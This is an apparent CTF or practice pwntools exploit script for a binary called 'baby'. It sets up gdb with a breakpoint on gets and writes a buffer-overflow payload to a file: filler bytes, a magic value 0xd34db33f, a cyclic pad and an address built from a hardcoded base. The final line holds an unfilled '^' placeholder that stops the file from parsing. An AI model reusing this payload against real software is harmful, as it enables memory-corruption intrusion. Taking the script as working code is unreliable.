from pwn import *
# The target binary is expected in the directory the script is run from;
# pwntools' ELF parses it so elf.path can be handed to gdb/process below.
elf = ELF(f"{os.getcwd()}/baby")
# gdb command script passed to gdb.debug() by start(). LINES/COLUMNS are
# unset so the debuggee's environment is the same as in a plain run; the
# breakpoint on an absolute address is kept commented out for reference and
# the live breakpoint is on gets(), presumably where the target reads input.
gs = "\n".join([
    "",
    "unset env LINES",
    "unset env COLUMNS",
    "set follow-fork-mode child",
    "# br *0x5663c4b8",
    "br gets",
    "continue",
    "",
])
def start():
    """Launch the target, under gdb when the script is run with a GDB argument.

    pwntools' ``args`` collects KEY=value words from the command line, so
    ``args.GDB`` selects the gdb path, where ``gs`` is the command script
    handed to gdb at startup.  Otherwise the binary is started as a plain
    local process.  Returns the pwntools tube in either case.
    """
    if args.GDB:
        return gdb.debug(elf.path, gs)
    return process([elf.path])
# io = start()
# input("waiting...")
# Page-aligned base added to the last p32() value in the payload below;
# presumably the target's load address as observed in the debugger -- TODO
# confirm, it changes between runs when ASLR is enabled.
OFFSET = 0x56555000
# Build the payload and save it to ./input rather than sending it to a live
# process (the io = start() / io.interactive lines are commented out).
# "wb+" also opens the file for reading, which nothing here uses; "wb" would do.
with open("input", "wb+") as f:
    # Layout: 42 bytes of filler, two little-endian 32-bit words, a filler of
    # the length at which 'caaa' appears in pwntools' cyclic pattern, then a
    # 32-bit value relative to OFFSET.  The two constants are presumably values
    # the binary checks -- verify against the target.
    # NOTE(review): `^` is not valid Python; this argument is an unfilled
    # placeholder, so the whole file fails to parse at this line.
    f.write(b'A'*42 + p32(1) + p32(0xd34db33f) + cyclic(cyclic_find('caaa')) + p32(OFFSET + ^))
# io.interactive